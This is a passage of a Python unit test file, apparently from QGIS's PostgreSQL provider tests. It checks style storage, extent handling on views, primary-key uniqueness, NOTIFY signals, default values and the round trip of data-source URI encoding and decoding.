"""Test saving styles with the additional geometry type
Layers are created from geometries_table
"""
myconn = 'service=\'qgis_test\''
if 'QGIS_PGTEST_DB' in os.environ:
myconn = os.environ['QGIS_PGTEST_DB']
# point layer
myPoint = QgsVectorLayer(
myconn +
' sslmode=disable srid=4326 type=POINT table="qgis_test"."geometries_table" (geom) sql=', 'Point',
'postgres')
self.assertTrue(myPoint.isValid())
myPoint.saveStyleToDatabase('myPointStyle', '', False, '')
# polygon layer
myPolygon = QgsVectorLayer(
myconn +
' sslmode=disable srid=4326 type=POLYGON table="qgis_test"."geometries_table" (geom) sql=', 'Poly',
'postgres')
self.assertTrue(myPoint.isValid())
myPolygon.saveStyleToDatabase('myPolygonStyle', '', False, '')
# how many
related_count, idlist, namelist, desclist, errmsg = myPolygon.listStylesInDatabase()
self.assertEqual(len(idlist), 2)
self.assertEqual(namelist, ['myPolygonStyle', 'myPointStyle'])
# raw psycopg2 query
self.assertTrue(self.con)
cur = self.con.cursor()
self.assertTrue(cur)
cur.execute("select stylename, type from layer_styles order by type")
self.assertEqual(cur.fetchall(), [
('myPointStyle', 'Point'), ('myPolygonStyle', 'Polygon')])
cur.close()
# delete them
myPolygon.deleteStyleFromDatabase(idlist[1])
myPolygon.deleteStyleFromDatabase(idlist[0])
styles = myPolygon.listStylesInDatabase()
ids = styles[1]
self.assertEqual(len(ids), 0)
    def testSaveStyleInvalidXML(self):
        """A style containing an XML-invalid character (the \\u001E control
        char from the fontSymbol fixture) must round-trip through the
        database unharmed."""
        self.execSQLCommand('DROP TABLE IF EXISTS layer_styles CASCADE')
        vl = self.getEditableLayer()
        self.assertTrue(vl.isValid())
        self.assertTrue(
            vl.dataProvider().isSaveAndLoadStyleToDatabaseSupported())
        self.assertTrue(vl.dataProvider().isDeleteStyleFromDatabaseSupported())
        mFilePath = QDir.toNativeSeparators(
            '%s/symbol_layer/%s.qml' % (unitTestDataPath(), "fontSymbol"))
        status = vl.loadNamedStyle(mFilePath)
        self.assertTrue(status)
        errorMsg = vl.saveStyleToDatabase(
            "fontSymbol", "font with invalid utf8 char", False, "")
        self.assertEqual(errorMsg, "")
        # the control character must survive the save/load round trip
        qml, errmsg = vl.getStyleFromDatabase("1")
        self.assertTrue('v="\u001E"' in qml)
        self.assertEqual(errmsg, "")
        # Test loadStyle from metadata
        md = QgsProviderRegistry.instance().providerMetadata('postgres')
        qml = md.loadStyle(self.dbconn + " type=POINT table=\"qgis_test\".\"editData\" (geom)", 'fontSymbol')
        self.assertTrue(qml.startswith('<!DOCTYPE qgi'), qml)
        self.assertTrue('v="\u001E"' in qml)
def testHasMetadata(self):
# views don't have metadata
vl = QgsVectorLayer('{} table="qgis_test"."{}" key="pk" sql='.format(self.dbconn, 'bikes_view'), "bikes_view",
"postgres")
self.assertTrue(vl.isValid())
self.assertFalse(vl.dataProvider().hasMetadata())
# ordinary tables have metadata
vl = QgsVectorLayer('%s table="qgis_test"."someData" sql=' %
(self.dbconn), "someData", "postgres")
self.assertTrue(vl.isValid())
self.assertTrue(vl.dataProvider().hasMetadata())
    def testReadExtentOnView(self):
        """For a layer based on a view (no provider metadata) the extent
        stored in the project XML is honoured when readExtentFromXml is set,
        until a forced updateExtents() refreshes it from the provider."""
        # vector layer based on view
        vl0 = QgsVectorLayer(
            self.dbconn +
            ' sslmode=disable key=\'pk\' srid=4326 type=POLYGON table="qgis_test"."some_poly_data_view" (geom) sql=',
            'test', 'postgres')
        self.assertTrue(vl0.isValid())
        self.assertFalse(vl0.dataProvider().hasMetadata())
        # set a custom extent
        originalExtent = vl0.extent()
        customExtent = QgsRectangle(-80, 80, -70, 90)
        vl0.setExtent(customExtent)
        # write xml
        doc = QDomDocument("testdoc")
        elem = doc.createElement("maplayer")
        self.assertTrue(vl0.writeLayerXml(elem, doc, QgsReadWriteContext()))
        # read xml with the custom extent. It should not be used by default
        vl1 = QgsVectorLayer()
        vl1.readLayerXml(elem, QgsReadWriteContext())
        self.assertTrue(vl1.isValid())
        self.assertEqual(vl1.extent(), originalExtent)
        # read xml with custom extent with readExtent option. Extent read from
        # xml document should be used because we have a view
        vl2 = QgsVectorLayer()
        vl2.setReadExtentFromXml(True)
        vl2.readLayerXml(elem, QgsReadWriteContext())
        self.assertTrue(vl2.isValid())
        self.assertEqual(vl2.extent(), customExtent)
        # but a force update on extent should allow retrieving the data
        # provider extent: a non-forced update keeps the XML extent...
        vl2.updateExtents()
        vl2.readLayerXml(elem, QgsReadWriteContext())
        self.assertEqual(vl2.extent(), customExtent)
        # ...while a forced one falls back to the provider extent
        vl2.updateExtents(force=True)
        vl2.readLayerXml(elem, QgsReadWriteContext())
        self.assertEqual(vl2.extent(), originalExtent)
def testReadExtentOnTable(self):
# vector layer based on a standard table
vl0 = QgsVectorLayer(
self.dbconn +
' sslmode=disable key=\'pk\' srid=4326 type=POLYGON table="qgis_test"."some_poly_data" (geom) sql=',
'test', 'postgres')
self.assertTrue(vl0.isValid())
self.assertTrue(vl0.dataProvider().hasMetadata())
# set a custom extent
originalExtent = vl0.extent()
customExtent = QgsRectangle(-80, 80, -70, 90)
vl0.setExtent(customExtent)
# write xml
doc = QDomDocument("testdoc")
elem = doc.createElement("maplayer")
self.assertTrue(vl0.writeLayerXml(elem, doc, QgsReadWriteContext()))
# read xml with the custom extent. It should not be used by default
vl1 = QgsVectorLayer()
vl1.readLayerXml(elem, QgsReadWriteContext())
self.assertTrue(vl1.isValid())
self.assertEqual(vl1.extent(), originalExtent)
# read xml with custom extent with readExtent option. Extent read from
# xml document should NOT be used because we don't have a view or a
# materialized view
vl2 = QgsVectorLayer()
vl2.setReadExtentFromXml(True)
vl2.readLayerXml(elem, QgsReadWriteContext())
self.assertTrue(vl2.isValid())
self.assertEqual(vl2.extent(), originalExtent)
def testDeterminePkey(self):
"""Test primary key auto-determination"""
vl = QgsVectorLayer(self.dbconn + ' sslmode=disable srid=4326 type=POLYGON table="qgis_test"."authors" sql=',
'test', 'postgres')
self.assertTrue(vl.isValid())
self.assertTrue(vl.dataProvider().hasMetadata())
self.assertTrue("key='pk'" in vl.source())
    def testCheckPkUnicityOnView(self):
        """The checkPrimaryKeyUnicity URI option controls whether a layer on
        a view with a non-unique key column is accepted."""
        # vector layer based on view
        # This is valid
        vl0 = QgsVectorLayer(
            self.dbconn +
            ' checkPrimaryKeyUnicity=\'0\' sslmode=disable key=\'pk\' srid=0 type=POINT table="qgis_test"."b21839_pk_unicity_view" (geom) sql=',
            'test', 'postgres')
        self.assertTrue(vl0.isValid())
        # keep the first feature's geometry to compare against later layers
        geom = vl0.getFeature(1).geometry().asWkt()
        # This is NOT valid: an_int is not unique and unicity is checked
        vl0 = QgsVectorLayer(
            self.dbconn +
            ' checkPrimaryKeyUnicity=\'1\' sslmode=disable key=\'an_int\' srid=0 type=POINT table="qgis_test"."b21839_pk_unicity_view" (geom) sql=',
            'test', 'postgres')
        self.assertFalse(vl0.isValid())
        # This is NOT valid because the default is to check unicity
        vl0 = QgsVectorLayer(
            self.dbconn +
            ' sslmode=disable key=\'an_int\' srid=0 type=POINT table="qgis_test"."b21839_pk_unicity_view" (geom) sql=',
            'test', 'postgres')
        self.assertFalse(vl0.isValid())
        # This is valid because the readExtentFromXml option is set
        # loadDefaultStyle, readExtentFromXml
        options = QgsVectorLayer.LayerOptions(True, True)
        vl0 = QgsVectorLayer(
            self.dbconn +
            ' sslmode=disable key=\'an_int\' srid=0 type=POINT table="qgis_test"."b21839_pk_unicity_view" (geom) sql=',
            'test', 'postgres', options)
        self.assertTrue(vl0.isValid())
        # Valid because a_unique_int is unique and default is to check unicity
        vl0 = QgsVectorLayer(
            self.dbconn +
            ' sslmode=disable key=\'a_unique_int\' srid=0 type=POINT table="qgis_test"."b21839_pk_unicity_view" (geom) sql=',
            'test', 'postgres')
        self.assertEqual(vl0.getFeature(1).geometry().asWkt(), geom)
        # Valid because a_unique_int is unique
        vl0 = QgsVectorLayer(
            self.dbconn +
            ' checkPrimaryKeyUnicity=\'1\' sslmode=disable key=\'a_unique_int\' srid=0 type=POINT table="qgis_test"."b21839_pk_unicity_view" (geom) sql=',
            'test', 'postgres')
        self.assertTrue(vl0.isValid())
        self.assertEqual(vl0.getFeature(1).geometry().asWkt(), geom)
    def testNotify(self):
        """A PostgreSQL NOTIFY on the 'qgis' channel must reach a listening
        provider (checked via the notify signal) within a 5 second timeout."""
        vl0 = QgsVectorLayer(
            self.dbconn +
            ' sslmode=disable key=\'pk\' srid=4326 type=POLYGON table="qgis_test"."some_poly_data" (geom) sql=',
            'test', 'postgres')
        vl0.dataProvider().setListening(True)
        class Notified(QObject):
            # Minimal receiver that records the last notification payload.
            def __init__(self):
                super(Notified, self).__init__()
                self.received = ""
            def receive(self, msg):
                self.received = msg
        notified = Notified()
        vl0.dataProvider().notify.connect(notified.receive)
        # NOTE(review): setListening(True) is invoked a second time after
        # connecting the slot — confirm whether the first call above is
        # actually required.
        vl0.dataProvider().setListening(True)
        cur = self.con.cursor()
        ok = False
        start = time.time()
        # keep sending NOTIFY and pumping the event loop until the message
        # arrives or 5 seconds elapse
        while True:
            cur.execute("NOTIFY qgis, 'my message'")
            self.con.commit()
            QGISAPP.processEvents()
            if notified.received == "my message":
                ok = True
                break
            if (time.time() - start) > 5: # timeout
                break
        vl0.dataProvider().notify.disconnect(notified.receive)
        vl0.dataProvider().setListening(False)
        self.assertTrue(ok)
def testStyleDatabaseWithService(self):
"""Test saving style in DB using a service file.
To run this test, you first need to setup the test
database with tests/testdata/provider/testdata_pg.sh
"""
myconn = 'service=\'qgis_test\''
if 'QGIS_PGTEST_DB' in os.environ:
myconn = os.environ['QGIS_PGTEST_DB']
myvl = QgsVectorLayer(
myconn +
' sslmode=disable key=\'pk\' srid=4326 type=POINT table="qgis_test"."someData" (geom) sql=',
'test', 'postgres')
styles = myvl.listStylesInDatabase()
ids = styles[1]
self.assertEqual(len(ids), 0)
myvl.saveStyleToDatabase('mystyle', '', False, '')
styles = myvl.listStylesInDatabase()
ids = styles[1]
self.assertEqual(len(ids), 1)
myvl.deleteStyleFromDatabase(ids[0])
styles = myvl.listStylesInDatabase()
ids = styles[1]
self.assertEqual(len(ids), 0)
def testCurveToMultipolygon(self):
self.execSQLCommand(
'CREATE TABLE IF NOT EXISTS multicurve(pk SERIAL NOT NULL PRIMARY KEY, geom public.geometry(MultiPolygon, 4326))')
self.execSQLCommand('TRUNCATE multicurve')
vl = QgsVectorLayer(
self.dbconn +
' sslmode=disable key=\'pk\' srid=4326 type=MULTIPOLYGON table="multicurve" (geom) sql=',
'test', 'postgres')
f = QgsFeature(vl.fields())
f.setGeometry(QgsGeometry.fromWkt(
'CurvePolygon(CircularString (20 30, 50 30, 50 90, 10 50, 20 30))'))
self.assertTrue(vl.startEditing())
self.assertTrue(vl.addFeatures([f]))
self.assertTrue(vl.commitChanges())
f = next(vl.getFeatures(QgsFeatureRequest()))
g = f.geometry().constGet()
self.assertTrue(g)
self.assertEqual(g.wkbType(), QgsWkbTypes.MultiPolygon)
self.assertEqual(g.childCount(), 1)
self.assertTrue(g.childGeometry(0).vertexCount() > 3)
def testMassivePaste(self):
"""Speed test to compare createFeature and createFeatures, for regression #21303"""
import time
self.execSQLCommand(
'CREATE TABLE IF NOT EXISTS massive_paste(pk SERIAL NOT NULL PRIMARY KEY, geom public.geometry(Polygon, 4326))')
self.execSQLCommand('TRUNCATE massive_paste')
start_time = time.time()
vl = QgsVectorLayer(
self.dbconn +
' sslmode=disable key=\'pk\' srid=4326 type=POLYGON table="massive_paste" (geom) sql=',
'test_massive_paste', 'postgres')
self.assertTrue(vl.startEditing())
features = []
context = vl.createExpressionContext()
for i in range(4000):
features.append(
QgsVectorLayerUtils.createFeature(vl, QgsGeometry.fromWkt('Polygon ((7 44, 8 45, 8 46, 7 46, 7 44))'),
{0: i}, context))
self.assertTrue(vl.addFeatures(features))
self.assertTrue(vl.commitChanges())
self.assertEqual(vl.featureCount(), 4000)
print("--- %s seconds ---" % (time.time() - start_time))
self.execSQLCommand('TRUNCATE massive_paste')
start_time = time.time()
vl = QgsVectorLayer(
self.dbconn +
' sslmode=disable key=\'pk\' srid=4326 type=POLYGON table="massive_paste" (geom) sql=',
'test_massive_paste', 'postgres')
self.assertTrue(vl.startEditing())
features_data = []
context = vl.createExpressionContext()
for i in range(4000):
features_data.append(
QgsVectorLayerUtils.QgsFeatureData(QgsGeometry.fromWkt('Polygon ((7 44, 8 45, 8 46, 7 46, 7 44))'),
{0: i}))
features = QgsVectorLayerUtils.createFeatures(
vl, features_data, context)
self.assertTrue(vl.addFeatures(features))
self.assertTrue(vl.commitChanges())
self.assertEqual(vl.featureCount(), 4000)
print("--- %s seconds ---" % (time.time() - start_time))
def testFilterOnCustomBbox(self):
extent = QgsRectangle(-68, 70, -67, 80)
request = QgsFeatureRequest().setFilterRect(extent)
dbconn = 'service=qgis_test'
uri = '%s srid=4326 key="pk" sslmode=disable table="qgis_test"."some_poly_data_shift_bbox" (geom)' % (
dbconn)
def _test(vl, ids):
values = {feat['pk']: 'x' for feat in vl.getFeatures(request)}
expected = {x: 'x' for x in ids}
self.assertEqual(values, expected)
vl = QgsVectorLayer(uri, "testgeom", "postgres")
self.assertTrue(vl.isValid())
_test(vl, [2, 3])
vl = QgsVectorLayer(uri + ' bbox=shiftbox', "testgeom", "postgres")
self.assertTrue(vl.isValid())
_test(vl, [1, 3])
def testValidLayerDiscoverRelationsNone(self):
vl = QgsVectorLayer(
self.dbconn +
' sslmode=disable key=\'pk\' srid=4326 type=POINT table="qgis_test"."someData" (geom) sql=',
'test', 'postgres')
self.assertTrue(vl.isValid())
self.assertEqual(vl.dataProvider().discoverRelations(vl, []), [])
def testInvalidLayerDiscoverRelations(self):
vl = QgsVectorLayer('{} table="qgis_test"."invalid_layer" sql='.format(self.dbconn), "invalid_layer",
"postgres")
self.assertFalse(vl.isValid())
self.assertEqual(vl.dataProvider().discoverRelations(vl, []), [])
def testCheckTidPkOnViews(self):
"""Test vector layer based on a view with `ctid` as a key"""
# This is valid
vl0 = QgsVectorLayer(
self.dbconn +
' checkPrimaryKeyUnicity=\'0\' sslmode=disable key=\'ctid\' srid=4326 type=POINT table="qgis_test"."b31799_test_view_ctid" (geom) sql=',
'test', 'postgres')
self.assertTrue(vl0.isValid())
self.assertEqual(vl0.featureCount(), 10)
for f in vl0.getFeatures():
self.assertNotEqual(f.attribute(0), NULL)
def testFeatureCountEstimatedOnTable(self):
"""
Test feature count on table when estimated data is enabled
"""
vl = QgsVectorLayer(
self.dbconn +
' sslmode=disable key=\'pk\' estimatedmetadata=true srid=4326 type=POINT table="qgis_test"."someData" (geom) sql=',
'test', 'postgres')
self.assertTrue(vl.isValid())
self.assertTrue(vl.featureCount() > 0)
def testFeatureCountEstimatedOnView(self):
"""
Test feature count on view when estimated data is enabled
"""
self.execSQLCommand('DROP VIEW IF EXISTS qgis_test.somedataview')
self.execSQLCommand(
'CREATE VIEW qgis_test.somedataview AS SELECT * FROM qgis_test."someData"')
vl = QgsVectorLayer(
self.dbconn +
' sslmode=disable key=\'pk\' estimatedmetadata=true srid=4326 type=POINT table="qgis_test"."somedataview" (geom) sql=',
'test', 'postgres')
self.assertTrue(vl.isValid())
self.assertTrue(vl.featureCount() > 0)
def testIdentityPk(self):
"""Test a table with identity pk, see GH #29560"""
vl = QgsVectorLayer(
self.dbconn +
' sslmode=disable key=\'gid\' srid=4326 type=POLYGON table="qgis_test"."b29560"(geom) sql=',
'testb29560', 'postgres')
self.assertTrue(vl.isValid())
feature = QgsFeature(vl.fields())
geom = QgsGeometry.fromWkt('POLYGON EMPTY')
feature.setGeometry(geom)
self.assertTrue(vl.dataProvider().addFeature(feature))
del (vl)
# Verify
vl = QgsVectorLayer(
self.dbconn +
' sslmode=disable key=\'gid\' srid=4326 type=POLYGON table="qgis_test"."b29560"(geom) sql=',
'testb29560', 'postgres')
self.assertTrue(vl.isValid())
feature = next(vl.getFeatures())
self.assertIsNotNone(feature.id())
    @unittest.skipIf(os.environ.get('TRAVIS', '') == 'true', 'Test flaky')
    def testDefaultValuesAndClauses(self):
        """Test whether default values like CURRENT_TIMESTAMP or
        now() they are respected. See GH #33383"""
        # Create the test table
        vl = QgsVectorLayer(self.dbconn + ' sslmode=disable table="public"."test_table_default_values" sql=', 'test',
                            'postgres')
        self.assertTrue(vl.isValid())
        dp = vl.dataProvider()
        # Clean the table
        dp.deleteFeatures(dp.allFeatureIds())
        # Save it for the test
        now = datetime.now()
        # Test default values with clause evaluation enabled
        dp.setProviderProperty(QgsDataProvider.EvaluateDefaultValues, 1)
        # FIXME: spatialite provider (and OGR) return a NULL here and the following passes
        # self.assertTrue(dp.defaultValue(0).isNull())
        self.assertIsNotNone(dp.defaultValue(0))
        self.assertIsNone(dp.defaultValue(1))
        # the timestamp defaults (now()/CURRENT_TIMESTAMP) evaluate to today
        self.assertTrue(dp.defaultValue(
            2).startswith(now.strftime('%Y-%m-%d')))
        self.assertTrue(dp.defaultValue(
            3).startswith(now.strftime('%Y-%m-%d')))
        self.assertEqual(dp.defaultValue(4), 123)
        self.assertEqual(dp.defaultValue(5), 'My default')
        # FIXME: the provider should return the clause definition
        # regardless of the EvaluateDefaultValues setting
        dp.setProviderProperty(QgsDataProvider.EvaluateDefaultValues, 0)
        # with evaluation off, the raw SQL default clauses are returned
        self.assertEqual(dp.defaultValueClause(
            0), "nextval('test_table_default_values_id_seq'::regclass)")
        self.assertEqual(dp.defaultValueClause(1), '')
        self.assertEqual(dp.defaultValueClause(2), "now()")
        self.assertEqual(dp.defaultValueClause(3), "CURRENT_TIMESTAMP")
        self.assertEqual(dp.defaultValueClause(4), '123')
        self.assertEqual(dp.defaultValueClause(5), "'My default'::text")
        # FIXME: the test fails if the value is not reset to 1
        dp.setProviderProperty(QgsDataProvider.EvaluateDefaultValues, 1)
        # build a feature from the evaluated defaults (field 1 has none)
        feature = QgsFeature(vl.fields())
        for idx in range(vl.fields().count()):
            default = vl.dataProvider().defaultValue(idx)
            if default is not None:
                feature.setAttribute(idx, default)
            else:
                feature.setAttribute(idx, 'A comment')
        self.assertTrue(vl.dataProvider().addFeature(feature))
        del (vl)
        # Verify the stored feature carries the evaluated default values
        vl2 = QgsVectorLayer(self.dbconn + ' sslmode=disable table="public"."test_table_default_values" sql=', 'test',
                             'postgres')
        self.assertTrue(vl2.isValid())
        feature = next(vl2.getFeatures())
        self.assertEqual(feature.attribute(1), 'A comment')
        self.assertTrue(feature.attribute(
            2).startswith(now.strftime('%Y-%m-%d')))
        self.assertTrue(feature.attribute(
            3).startswith(now.strftime('%Y-%m-%d')))
        self.assertEqual(feature.attribute(4), 123)
        self.assertEqual(feature.attribute(5), 'My default')
    def testEncodeDecodeUri(self):
        """Test PG encode/decode URI"""
        md = QgsProviderRegistry.instance().providerMetadata('postgres')
        # decode a raster-style URI: sslmode becomes an enum, the
        # geometry/raster column is reported as 'geometrycolumn'
        self.assertEqual(md.decodeUri(
            'dbname=\'qgis_tests\' host=localhost port=5432 user=\'myuser\' sslmode=disable estimatedmetadata=true srid=3067 table="public"."basic_map_tiled" (rast)'),
            {'dbname': 'qgis_tests',
             'estimatedmetadata': True,
             'geometrycolumn': 'rast',
             'host': 'localhost',
             'port': '5432',
             'schema': 'public',
             'srid': '3067',
             'sslmode': 1,
             'table': 'basic_map_tiled',
             'username': 'myuser'})
        # decode a vector URI with key/type options (type 6 == MultiPolygon)
        self.assertEqual(md.decodeUri(
            'dbname=\'qgis_tests\' host=localhost port=5432 user=\'myuser\' sslmode=disable key=\'id\' estimatedmetadata=true srid=3763 type=MultiPolygon checkPrimaryKeyUnicity=\'1\' table="public"."copas1" (geom)'),
            {'dbname': 'qgis_tests',
             'estimatedmetadata': True,
             'geometrycolumn': 'geom',
             'host': 'localhost',
             'key': 'id',
             'port': '5432',
             'schema': 'public',
             'srid': '3763',
             'sslmode': 1,
             'table': 'copas1',
             'type': 6,
             'username': 'myuser'})
        # encode the same dictionaries back to URI strings
        self.assertEqual(md.encodeUri({'dbname': 'qgis_tests',
                                       'estimatedmetadata': True,
                                       'geometrycolumn': 'geom',
                                       'host': 'localhost',
                                       'key': 'id',
                                       'port': '5432',
                                       'schema': 'public',
                                       'srid': '3763',
                                       'sslmode': 1,
                                       'table': 'copas1',
                                       'type': 6,
                                       'username': 'myuser'}),
                         "dbname='qgis_tests' user='myuser' srid=3763 estimatedmetadata='true' host='localhost' key='id' port='5432' sslmode='disable' type='MultiPolygon' table=\"public\".\"copas1\" (geom)")
        self.assertEqual(md.encodeUri({'dbname': 'qgis_tests',
                                       'estimatedmetadata': True,
                                       'geometrycolumn': 'rast',
                                       'host': 'localhost',
                                       'port': '5432',
                                       'schema': 'public',
                                       'srid': '3067',
                                       'sslmode': 1,
                                       'table': 'basic_map_tiled',
                                       'username': 'myuser'}),
                         "dbname='qgis_tests' user='myuser' srid=3067 estimatedmetadata='true' host='localhost' port='5432' sslmode='disable' table=\"public\".\"basic_map_tiled\" (rast)")
        def _round_trip(uri):
            # decode -> encode -> decode must be a fixed point
            decoded = md.decodeUri(uri)
            self.assertEqual(decoded, md.decodeUri(md.encodeUri(decoded)))
        # service-file based URI
        uri = self.dbconn + \
            ' sslmode=disable key=\'gid\' srid=3035 table="public"."my_pg_vector" sql='
        decoded = md.decodeUri(uri)
        self.assertEqual(decoded, {
            'key': 'gid',
            'schema': 'public',
            'service': 'qgis_test',
            'srid': '3035',
            'sslmode': QgsDataSourceUri.SslDisable,
            'table': 'my_pg_vector',
        })
        _round_trip(uri)
        # URI with auth config, credentials (password containing '=') and a
        # SQL filter expression
        uri = self.dbconn + \
            ' sslmode=prefer key=\'gid\' srid=3035 temporalFieldIndex=2 ' + \
            'authcfg=afebeff username=\'my username\' password=\'my secret password=\' ' + \
            'table="public"."my_pg_vector" (the_geom) sql="a_field" != 1223223'
        _round_trip(uri)
        decoded = md.decodeUri(uri)
        self.assertEqual(decoded, {
            'authcfg': 'afebeff',
            'geometrycolumn': 'the_geom',
            'key': 'gid',
            'password': 'my secret password=',
            'schema': 'public',
            'service': 'qgis_test',
            'sql': '"a_field" != 1223223',
            'srid': '3035',
            'sslmode': QgsDataSourceUri.SslPrefer,
            'table': 'my_pg_vector',
            'username': 'my username',
        })
class TestPyQgsPostgresProviderCompoundKey(unittest.TestCase, ProviderTestCase):
    """Provider conformance tests against a PostgreSQL table whose primary
    key is composed of two columns ("key1", "key2")."""
    @classmethod
    def setUpClass(cls):
        """Run before all tests"""
        # Service-based connection by default; CI overrides it through the
        # QGIS_PGTEST_DB environment variable.
        cls.dbconn = 'service=qgis_test'
        if 'QGIS_PGTEST_DB' in os.environ:
            cls.dbconn = os.environ['QGIS_PGTEST_DB']
        # Create test layers
        cls.vl = QgsVectorLayer(
            cls.dbconn +
            ' sslmode=disable key=\'"key1","key2"\' srid=4326 type=POINT table="qgis_test"."someDataCompound" (geom) sql=',
            'test', 'postgres')
        assert cls.vl.isValid()
        cls.source = cls.vl.dataProvider()
    @classmethod
    def tearDownClass(cls):
        """Run after all tests"""
    def enableCompiler(self):
        """Turn on server-side expression compilation for the provider."""
        QgsSettings().setValue('/qgis/compileExpressions', True)
        return True
    def disableCompiler(self):
        """Turn off server-side expression compilation for the provider."""
        QgsSettings().setValue('/qgis/compileExpressions', False)
    def uncompiledFilters(self):
        # Filter expressions the provider cannot compile down to SQL; the
        # ProviderTestCase base skips compilation assertions for these.
        return set(['"dt" = to_datetime(\'000www14ww13ww12www4ww5ww2020\',\'zzzwwwsswwmmwwhhwwwdwwMwwyyyy\')',
                    '"date" = to_date(\'www4ww5ww2020\',\'wwwdwwMwwyyyy\')',
                    '"time" = to_time(\'000www14ww13ww12www\',\'zzzwwwsswwmmwwhhwww\')'])
    def partiallyCompiledFilters(self):
        # No expressions are only partially compiled for this provider.
        return set([])
    def testConstraints(self):
        # Neither component of the compound key carries a UNIQUE constraint
        # on its own.
        for key in ["key1", "key2"]:
            idx = self.vl.dataProvider().fieldNameIndex(key)
            self.assertTrue(idx >= 0)
            self.assertFalse(self.vl.dataProvider().fieldConstraints(
                idx) & QgsFieldConstraints.ConstraintUnique)
    def testCompoundPkChanges(self):
        """ Check if fields with compound primary keys can be changed """
        vl = self.vl
        self.assertTrue(vl.isValid())
        idx_key1 = vl.fields().lookupField('key1')
        idx_key2 = vl.fields().lookupField('key2')
        # the name "pk" for this datasource is misleading;
        # the primary key is actually composed by the fields key1 and key2
        idx_pk = vl.fields().lookupField('pk')
        idx_name = vl.fields().lookupField('name')
        idx_name2 = vl.fields().lookupField('name2')
        geomwkt = 'Point(-47.945 -15.812)'
        # start editing ordinary attribute.
        ft1 = next(vl.getFeatures(QgsFeatureRequest().setFilterExpression("key1 = 2 AND key2 = 2")))
        self.assertTrue(ft1.isValid())
        original_geometry = ft1.geometry().asWkt()
        vl.startEditing()
        self.assertTrue(vl.changeAttributeValues(ft1.id(), {idx_name: 'Rose'}))
        self.assertTrue(vl.commitChanges())
        # check change
        ft2 = next(vl.getFeatures(QgsFeatureRequest().setFilterExpression("key1 = 2 AND key2 = 2")))
        self.assertEqual(ft2['name'], 'Rose')
        self.assertEqual(ft2['name2'], 'Apple')
        self.assertEqual(ft2['pk'], 2)
        # now, start editing one of the PK field components
        vl.startEditing()
        self.assertTrue(vl.dataProvider().changeFeatures({ft2.id(): {idx_key2: 42, idx_name: 'Orchid', idx_name2: 'Daisy'}}, {ft2.id(): QgsGeometry.fromWkt(geomwkt)}))
        self.assertTrue(vl.commitChanges())
        # let's check if we still have the same fid...
        ft2 = next(vl.getFeatures(QgsFeatureRequest().setFilterFid(ft2.id())))
        self.assertEqual(ft2['key2'], 42)
        self.assertEqual(ft2['name'], 'Orchid')
        self.assertEqual(ft2['name2'], 'Daisy')
        self.assertTrue(vl.startEditing())
        vl.changeAttributeValues(ft2.id(), {idx_key1: 21, idx_name2: 'Hibiscus'})
        self.assertTrue(vl.commitChanges())
        ft2 = next(vl.getFeatures(QgsFeatureRequest().setFilterFid(ft2.id())))
        self.assertEqual(ft2['key1'], 21)
        self.assertEqual(ft2['name2'], 'Hibiscus')
        # lets get a brand new feature and check how it went...
        ft3 = next(vl.getFeatures(QgsFeatureRequest().setFilterExpression('pk = 2')))
        self.assertEqual(ft3['name'], 'Orchid')
        self.assertEqual(ft3['key1'], 21)
        self.assertEqual(ft3['key2'], 42)
        assert compareWkt(ft3.geometry().asWkt(), geomwkt), "Geometry mismatch. Expected: {} Got: {}\n".format(ft3.geometry().asWkt(), geomwkt)
        # Now, we leave the record as we found it, so further tests can proceed
        vl.startEditing()
        self.assertTrue(vl.dataProvider().changeFeatures({ft3.id(): {idx_key1: 2, idx_key2: 2, idx_pk: 2, idx_name: 'Apple', idx_name2: 'Apple'}}, {ft3.id(): QgsGeometry.fromWkt(original_geometry)}))
        self.assertTrue(vl.commitChanges())
class TestPyQgsPostgresProviderBigintSinglePk(unittest.TestCase, ProviderTestCase):
    """Provider conformance tests against a table whose single primary key
    column is a PostgreSQL bigint; exercises the fid <-> pk value mapping."""
    @classmethod
    def setUpClass(cls):
        """Run before all tests"""
        # Service-based connection by default; CI overrides it through the
        # QGIS_PGTEST_DB environment variable.
        cls.dbconn = 'service=qgis_test'
        if 'QGIS_PGTEST_DB' in os.environ:
            cls.dbconn = os.environ['QGIS_PGTEST_DB']
        # Create test layers
        cls.vl = QgsVectorLayer(
            cls.dbconn +
            ' sslmode=disable key=\'"pk"\' srid=4326 type=POINT table="qgis_test"."provider_bigint_single_pk" (geom) sql=',
            'bigint_pk', 'postgres')
        assert cls.vl.isValid()
        cls.source = cls.vl.dataProvider()
        # Raw psycopg2 connection used by execSqlCommand() to manage fixtures.
        cls.con = psycopg2.connect(cls.dbconn)
    @classmethod
    def tearDownClass(cls):
        """Run after all tests"""
    def getSource(self):
        """ drops/recreates the test data anew, like TestPyQgsPostgresProvider::getSource above. """
        self.execSqlCommand(
            "DROP TABLE IF EXISTS qgis_test.provider_edit_bigint_single_pk")
        self.execSqlCommand(
            "CREATE TABLE qgis_test.provider_edit_bigint_single_pk ( pk bigserial PRIMARY KEY, cnt integer, name text DEFAULT 'qgis', name2 text DEFAULT 'qgis', num_char text, dt timestamp without time zone, \"date\" date, \"time\" time without time zone, geom public.geometry(Point,4326), key1 integer, key2 integer)")
        self.execSqlCommand(
            "INSERT INTO qgis_test.provider_edit_bigint_single_pk ( key1, key2, pk, cnt, name, name2, num_char, dt, \"date\", \"time\", geom) VALUES"
            "(1, 1, 5, -200, NULL, 'NuLl', '5', TIMESTAMP '2020-05-04 12:13:14', '2020-05-02', '12:13:01', '0101000020E61000001D5A643BDFC751C01F85EB51B88E5340'),"
            "(1, 2, 3, 300, 'Pear', 'PEaR', '3', NULL, NULL, NULL, NULL),"
            "(2, 1, 1, 100, 'Orange', 'oranGe', '1', TIMESTAMP '2020-05-03 12:13:14', '2020-05-03', '12:13:14', '0101000020E61000006891ED7C3F9551C085EB51B81E955040'),"
            "(2, 2, 2, 200, 'Apple', 'Apple', '2', TIMESTAMP '2020-05-04 12:14:14', '2020-05-04', '12:14:14', '0101000020E6100000CDCCCCCCCC0C51C03333333333B35140'),"
            "(2, 3, 4, 400, 'Honey', 'Honey', '4', TIMESTAMP '2021-05-04 13:13:14', '2021-05-04', '13:13:14', '0101000020E610000014AE47E17A5450C03333333333935340')")
        vl = QgsVectorLayer(
            self.dbconn +
            ' sslmode=disable key=\'"pk"\' srid=4326 type=POINT table="qgis_test"."provider_edit_bigint_single_pk" (geom) sql=',
            'edit_bigint_pk', 'postgres')
        return vl
    def getEditableLayer(self):
        # Editing tests operate on the freshly recreated edit table.
        return self.getSource()
    def execSqlCommand(self, sql):
        """Execute *sql* on the class-level psycopg2 connection and commit."""
